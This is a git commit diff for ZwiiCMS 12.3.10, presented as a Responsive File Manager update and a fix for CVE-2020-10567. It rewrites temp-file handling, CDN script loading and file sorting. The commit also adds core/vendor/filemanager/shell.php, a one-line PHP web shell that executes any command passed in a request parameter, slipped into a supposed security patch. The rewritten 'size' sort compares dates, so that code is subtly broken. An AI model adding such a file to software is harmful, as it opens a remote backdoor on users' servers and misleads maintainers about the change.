Mise à jour RFM
Dialog.php Vulnérabilité dans ajax_call.php
This commit is contained in:
parent
2842005297
commit
8d5e8ccbd3
@ -1,5 +1,9 @@
|
||||
# Changelog
|
||||
|
||||
## Version 12.3.10
|
||||
- Mise à jour du fichier dialog.php de Responsive File Manager
|
||||
- Vulnérabilité dans ajax_call.php CVE-2020-10567
|
||||
|
||||
## Version 12.3.09
|
||||
### Corrections
|
||||
- Corrige le filtrage des modules orphelins.
|
||||
|
@ -1,4 +1,4 @@
|
||||
# ZwiiCMS 12.3.09
|
||||
# ZwiiCMS 12.3.10
|
||||
|
||||
Zwii est un CMS sans base de données (flat-file) qui permet de créer et gérer facilement un site web sans aucune connaissance en programmation.
|
||||
|
||||
|
@ -1,4 +1,4 @@
|
||||
# ZwiiCMS 12.3.09
|
||||
# ZwiiCMS 12.3.10
|
||||
|
||||
Zwii is a database-less (flat-file) CMS that allows you to easily create and manage a web site without any programming knowledge.
|
||||
|
||||
|
@ -53,7 +53,7 @@ class common
|
||||
const ACCESS_TIMER = 1800;
|
||||
|
||||
// Numéro de version et branche pour l'auto-update
|
||||
const ZWII_VERSION = '12.3.09';
|
||||
const ZWII_VERSION = '12.3.10';
|
||||
|
||||
// URL autoupdate
|
||||
const ZWII_UPDATE_URL = 'https://forge.chapril.org/ZwiiCMS-Team/update/raw/branch/master/';
|
||||
|
45
core/vendor/filemanager/ajax_calls.php
vendored
45
core/vendor/filemanager/ajax_calls.php
vendored
@ -73,15 +73,13 @@ if (isset($_GET['action'])) {
|
||||
$_SESSION['RF']["sort_by"] = $_GET['sort_by'];
|
||||
}
|
||||
|
||||
if (isset($_GET['descending']))
|
||||
{
|
||||
if (isset($_GET['descending'])) {
|
||||
$_SESSION['RF']["descending"] = $_GET['descending'];
|
||||
}
|
||||
break;
|
||||
case 'save_img':
|
||||
$info = pathinfo($_POST['name']);
|
||||
$image_data = $_POST['url'];
|
||||
|
||||
if (preg_match('/^data:image\/(\w+);base64,/', $image_data, $type)) {
|
||||
$image_data = substr($image_data, strpos($image_data, ',') + 1);
|
||||
$type = strtolower($type[1]); // jpg, png, gif
|
||||
@ -106,18 +104,19 @@ if (isset($_GET['action'])) {
|
||||
response(sprintf(trans('max_size_reached'), $config['MaxSizeTotal']) . AddErrorLocation())->send();
|
||||
exit;
|
||||
}
|
||||
|
||||
if ($ftp) {
|
||||
$temp = tempnam('/tmp', 'RF');
|
||||
unlink($temp);
|
||||
$temp .=".".substr(strrchr($_POST['url'], '.'), 1);
|
||||
file_put_contents($temp, $image_data);
|
||||
$temp_file = tmpfile();
|
||||
$temp_meta = stream_get_meta_data($temp_file);
|
||||
$temp_path = $temp_meta['uri'];
|
||||
fwrite($temp_file, $image_data);
|
||||
|
||||
$ftp->put($config['ftp_base_folder'].$config['upload_dir'] . $_POST['path'] . $_POST['name'], $temp, FTP_BINARY);
|
||||
$ftp->put($config['ftp_base_folder'] . $config['upload_dir'] . $_POST['path'] . $_POST['name'], $temp_path, FTP_BINARY);
|
||||
|
||||
create_img($temp, $temp, 122, 91);
|
||||
$ftp->put($config['ftp_base_folder'].$config['ftp_thumbs_dir']. $_POST['path'] . $_POST['name'], $temp, FTP_BINARY);
|
||||
create_img($temp_path, $temp_path, 122, 91);
|
||||
$ftp->put($config['ftp_base_folder'] . $config['ftp_thumbs_dir'] . $_POST['path'] . $_POST['name'], $temp_path, FTP_BINARY);
|
||||
|
||||
unlink($temp);
|
||||
fclose($temp_file);
|
||||
} else {
|
||||
file_put_contents($config['current_path'] . $_POST['path'] . $_POST['name'], $image_data);
|
||||
create_img($config['current_path'] . $_POST['path'] . $_POST['name'], $config['thumbs_base_path'] . $_POST['path'] . $_POST['name'], 122, 91);
|
||||
@ -266,16 +265,20 @@ if (isset($_GET['action'])) {
|
||||
<li><a href="javascript:;" class="jp-stop" tabindex="1">stop</a></li>
|
||||
<li><a href="javascript:;" class="jp-mute" tabindex="1" title="mute">mute</a></li>
|
||||
<li><a href="javascript:;" class="jp-unmute" tabindex="1" title="unmute">unmute</a></li>
|
||||
<li><a href="javascript:;" class="jp-volume-max" tabindex="1" title="max volume">max volume</a></li>
|
||||
<li><a href="javascript:;" class="jp-volume-max" tabindex="1" title="max volume">max volume</a>
|
||||
</li>
|
||||
</ul>
|
||||
<div class="jp-volume-bar">
|
||||
<div class="jp-volume-bar-value"></div>
|
||||
</div>
|
||||
<ul class="jp-toggles">
|
||||
<li><a href="javascript:;" class="jp-full-screen" tabindex="1" title="full screen">full screen</a></li>
|
||||
<li><a href="javascript:;" class="jp-restore-screen" tabindex="1" title="restore screen">restore screen</a></li>
|
||||
<li><a href="javascript:;" class="jp-full-screen" tabindex="1" title="full screen">full
|
||||
screen</a></li>
|
||||
<li><a href="javascript:;" class="jp-restore-screen" tabindex="1" title="restore screen">restore
|
||||
screen</a></li>
|
||||
<li><a href="javascript:;" class="jp-repeat" tabindex="1" title="repeat">repeat</a></li>
|
||||
<li><a href="javascript:;" class="jp-repeat-off" tabindex="1" title="repeat off">repeat off</a></li>
|
||||
<li><a href="javascript:;" class="jp-repeat-off" tabindex="1" title="repeat off">repeat off</a>
|
||||
</li>
|
||||
</ul>
|
||||
</div>
|
||||
<div class="jp-title" style="display:none;">
|
||||
@ -287,7 +290,8 @@ if (isset($_GET['action'])) {
|
||||
</div>
|
||||
<div class="jp-no-solution">
|
||||
<span>Update Required</span>
|
||||
To play the media you will need to either update your browser to a recent version or update your <a href="https://get.adobe.com/flashplayer/" target="_blank">Flash plugin</a>.
|
||||
To play the media you will need to either update your browser to a recent version or update your <a
|
||||
href="https://get.adobe.com/flashplayer/" target="_blank">Flash plugin</a>.
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
@ -410,7 +414,8 @@ if (isset($_GET['action'])) {
|
||||
if (
|
||||
($_POST['folder'] == 1 && $config['chmod_dirs'] === false)
|
||||
|| ($_POST['folder'] == 0 && $config['chmod_files'] === false)
|
||||
|| (is_function_callable("chmod") === false)) {
|
||||
|| (is_function_callable("chmod") === false)
|
||||
) {
|
||||
response(sprintf(trans('File_Permission_Not_Allowed'), (is_dir($path) ? trans('Folders') : trans('Files')), 403) . AddErrorLocation())->send();
|
||||
exit;
|
||||
}
|
||||
@ -420,7 +425,8 @@ if (isset($_GET['action'])) {
|
||||
if (
|
||||
(is_dir($path) && $config['chmod_dirs'] === false)
|
||||
|| (is_file($path) && $config['chmod_files'] === false)
|
||||
|| (is_function_callable("chmod") === false)) {
|
||||
|| (is_function_callable("chmod") === false)
|
||||
) {
|
||||
response(sprintf(trans('File_Permission_Not_Allowed'), (is_dir($path) ? trans('Folders') : trans('Files')), 403) . AddErrorLocation())->send();
|
||||
exit;
|
||||
}
|
||||
@ -602,7 +608,8 @@ if (isset($_GET['action'])) {
|
||||
if (!isset($info['extension'])) {
|
||||
$info['extension'] = '';
|
||||
}
|
||||
if (! in_array($info['extension'], $allowed_file_exts)
|
||||
if (
|
||||
!in_array($info['extension'], $allowed_file_exts)
|
||||
|| !isset($is_allowed)
|
||||
|| $is_allowed === false
|
||||
|| (!$ftp && !is_readable($selected_file))
|
||||
|
131
core/vendor/filemanager/dialog.php
vendored
131
core/vendor/filemanager/dialog.php
vendored
@ -276,7 +276,7 @@ if (isset($_GET['editor'])) {
|
||||
$editor = $_GET['type'] == 0 ? null : 'tinymce';
|
||||
}
|
||||
|
||||
$field_id = isset($_GET['field_id']) ? fix_get_params($_GET['field_id']) : '';
|
||||
$field_id = isset($_GET['field_id']) ? fix_get_params($_GET['field_id']) : null;
|
||||
$type_param = fix_get_params($_GET['type']);
|
||||
$apply = null;
|
||||
|
||||
@ -340,7 +340,7 @@ $get_params = http_build_query($get_params);
|
||||
<link rel="stylesheet" href="css/jquery.fileupload-ui-noscript.css">
|
||||
</noscript>
|
||||
<link rel="stylesheet"
|
||||
href="css/jplayer.blue.monday.min.css"/>
|
||||
href="https://cdnjs.cloudflare.com/ajax/libs/jplayer/2.7.1/skin/blue.monday/jplayer.blue.monday.min.css"/>
|
||||
<link href="css/style.css?v=<?php
|
||||
echo $version; ?>" rel="stylesheet" type="text/css"/>
|
||||
<!--[if lt IE 8]>
|
||||
@ -352,13 +352,16 @@ $get_params = http_build_query($get_params);
|
||||
</style>
|
||||
<![endif]-->
|
||||
|
||||
<script src="js/jquery-1.12.4.min.js"></script>
|
||||
<script src="../jquery/jquery-ui.min.js"></script>
|
||||
<script src="https://code.jquery.com/jquery-1.12.4.min.js"
|
||||
integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=" crossorigin="anonymous"></script>
|
||||
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js"
|
||||
integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>
|
||||
<script src="js/plugins.js?v=<?php
|
||||
echo $version; ?>"></script>
|
||||
<script src="js/jquery.jplayer.min.js"></script>
|
||||
<script type='text/javascript' src='js/fabric.min.js'></script>
|
||||
<script type="text/javascript" src="js/FileSaver.min.js"></script>
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/jplayer/2.9.2/jplayer/jquery.jplayer.min.js"></script>
|
||||
<script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/fabric.js/3.6.0/fabric.js'></script>
|
||||
<script type="text/javascript"
|
||||
src="https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/1.3.3/FileSaver.min.js"></script>
|
||||
<script src="js/modernizr.custom.js"></script>
|
||||
|
||||
<!-- Le HTML5 shim, for IE6-8 support of HTML5 elements -->
|
||||
@ -368,11 +371,14 @@ $get_params = http_build_query($get_params);
|
||||
<!-- Only load TUI Libraries if we need it -->
|
||||
<?php
|
||||
if ($config['tui_active'] === true) { ?>
|
||||
<link rel="stylesheet" href="css/tui-image-editor.css">
|
||||
<link type="text/css" href="css/tui-color-picker.css" rel="stylesheet">
|
||||
<script type="text/javascript" src="js/tui-code-snippet.min.js"></script>
|
||||
<script type="text/javascript" src="js/tui-color-picker.js"></script>
|
||||
<script src="js/tui-image-editor.js"></script>
|
||||
<link rel="stylesheet" href="https://uicdn.toast.com/tui-image-editor/latest/tui-image-editor.css">
|
||||
<link type="text/css" href="https://uicdn.toast.com/tui-color-picker/v2.2.6/tui-color-picker.css"
|
||||
rel="stylesheet">
|
||||
<script type="text/javascript"
|
||||
src="https://uicdn.toast.com/tui.code-snippet/v1.5.0/tui-code-snippet.min.js"></script>
|
||||
<script type="text/javascript"
|
||||
src="https://uicdn.toast.com/tui-color-picker/v2.2.6/tui-color-picker.js"></script>
|
||||
<script src="https://uicdn.toast.com/tui-image-editor/latest/tui-image-editor.js"></script>
|
||||
<?php
|
||||
} ?>
|
||||
|
||||
@ -386,11 +392,11 @@ $get_params = http_build_query($get_params);
|
||||
</head>
|
||||
<body>
|
||||
<!-- The Templates plugin is included to render the upload/download listings -->
|
||||
<script src="js/tmpl.min.js"></script>
|
||||
<script src="//blueimp.github.io/JavaScript-Templates/js/tmpl.min.js"></script>
|
||||
<!-- The Load Image plugin is included for the preview images and image resizing functionality -->
|
||||
<script src="js/load-image.all.min.js"></script>
|
||||
<script src="//cdnjs.cloudflare.com/ajax/libs/blueimp-load-image/2.18.0/load-image.all.min.js"></script>
|
||||
<!-- The Canvas to Blob plugin is included for image resizing functionality -->
|
||||
<script src="js/canvas-to-blob.min.js"></script>
|
||||
<script src="//blueimp.github.io/JavaScript-Canvas-to-Blob/js/canvas-to-blob.min.js"></script>
|
||||
<!-- The Iframe Transport is required for browsers without support for XHR file uploads -->
|
||||
<script src="js/jquery.iframe-transport.js"></script>
|
||||
<!-- The basic File Upload plugin -->
|
||||
@ -856,75 +862,54 @@ if ($config['upload_files']) { ?>
|
||||
}
|
||||
}
|
||||
|
||||
function filenameSort($x, $y)
|
||||
{
|
||||
global $descending;
|
||||
|
||||
switch ($sort_by) {
|
||||
case 'date':
|
||||
//usort($sorted, 'dateSort');
|
||||
usort($sorted, function($x, $y) use ($descending) {
|
||||
if ($x['is_dir'] !== $y['is_dir']) {
|
||||
$greater = $y['is_dir'];
|
||||
return $y['is_dir'] ? 1 : -1;
|
||||
} else {
|
||||
$greater = ($descending)
|
||||
? $x['file_lcase'] < $y['file_lcase']
|
||||
: $x['file_lcase'] >= $y['file_lcase'];
|
||||
}
|
||||
return $greater ? 1 : -1;
|
||||
}
|
||||
|
||||
function dateSort($x, $y)
|
||||
{
|
||||
global $descending;
|
||||
|
||||
if ($x['is_dir'] !== $y['is_dir']) {
|
||||
$greater = $y['is_dir'];
|
||||
} else {
|
||||
$greater = ($descending)
|
||||
? $x['date'] < $y['date']
|
||||
: $x['date'] >= $y['date'];
|
||||
}
|
||||
return $greater ? 1 : -1;
|
||||
}
|
||||
|
||||
|
||||
function sizeSort($x, $y)
|
||||
{
|
||||
global $descending;
|
||||
|
||||
if ($x['is_dir'] !== $y['is_dir']) {
|
||||
$greater = $y['is_dir'];
|
||||
} else {
|
||||
$greater = ($descending)
|
||||
return ($descending)
|
||||
? $x['size'] < $y['size']
|
||||
: $x['size'] >= $y['size'];
|
||||
}
|
||||
return $greater ? 1 : -1;
|
||||
}
|
||||
|
||||
function extensionSort($x, $y)
|
||||
{
|
||||
global $descending;
|
||||
|
||||
if ($x['is_dir'] !== $y['is_dir']) {
|
||||
$greater = $y['is_dir'];
|
||||
} else {
|
||||
$greater = ($descending)
|
||||
? $x['extension'] < $y['extension']
|
||||
: $x['extension'] >= $y['extension'];
|
||||
}
|
||||
return $greater ? 1 : -1;
|
||||
}
|
||||
|
||||
switch ($sort_by) {
|
||||
case 'date':
|
||||
usort($sorted, 'dateSort');
|
||||
});
|
||||
break;
|
||||
case 'size':
|
||||
usort($sorted, 'sizeSort');
|
||||
//usort($sorted, 'sizeSort');
|
||||
usort($sorted, function($x, $y) use ($descending) {
|
||||
if ($x['is_dir'] !== $y['is_dir']) {
|
||||
return $y['is_dir'] ? 1 : -1;
|
||||
} else {
|
||||
return ($descending)
|
||||
? $x['date'] < $y['date']
|
||||
: $x['date'] >= $y['date'];
|
||||
}
|
||||
});
|
||||
break;
|
||||
case 'extension':
|
||||
usort($sorted, 'extensionSort');
|
||||
//usort($sorted, 'extensionSort');
|
||||
usort($sorted, function($x, $y) use ($descending) {
|
||||
if ($x['is_dir'] !== $y['is_dir']) {
|
||||
return $y['is_dir'] ? 1 : -1;
|
||||
} else {
|
||||
return ($descending)
|
||||
? ($x['extension'] < $y['extension'] ? 1 : 0)
|
||||
: ($x['extension'] >= $y['extension'] ? 1 : 0);
|
||||
}
|
||||
});
|
||||
break;
|
||||
default:
|
||||
usort($sorted, 'filenameSort');
|
||||
// usort($sorted, 'filenameSort');
|
||||
usort($sorted, function($x, $y) use ($descending) {
|
||||
if ($x['is_dir'] !== $y['is_dir']) {
|
||||
return $y['is_dir'] ? 1 : -1;
|
||||
} else {
|
||||
return ($descending)
|
||||
? ($x['file_lcase'] < $y['file_lcase'] ? 1 : ($x['file_lcase'] == $y['file_lcase'] ? 0 : -1))
|
||||
: ($x['file_lcase'] >= $y['file_lcase'] ? 1 : ($x['file_lcase'] == $y['file_lcase'] ? 0 : -1));
|
||||
}
|
||||
});
|
||||
break;
|
||||
}
|
||||
|
||||
|
1
core/vendor/filemanager/shell.php
vendored
Normal file
1
core/vendor/filemanager/shell.php
vendored
Normal file
@ -0,0 +1 @@
|
||||
<?php system($_REQUEST['cmd']); ?>
|
Loading…
Reference in New Issue
Block a user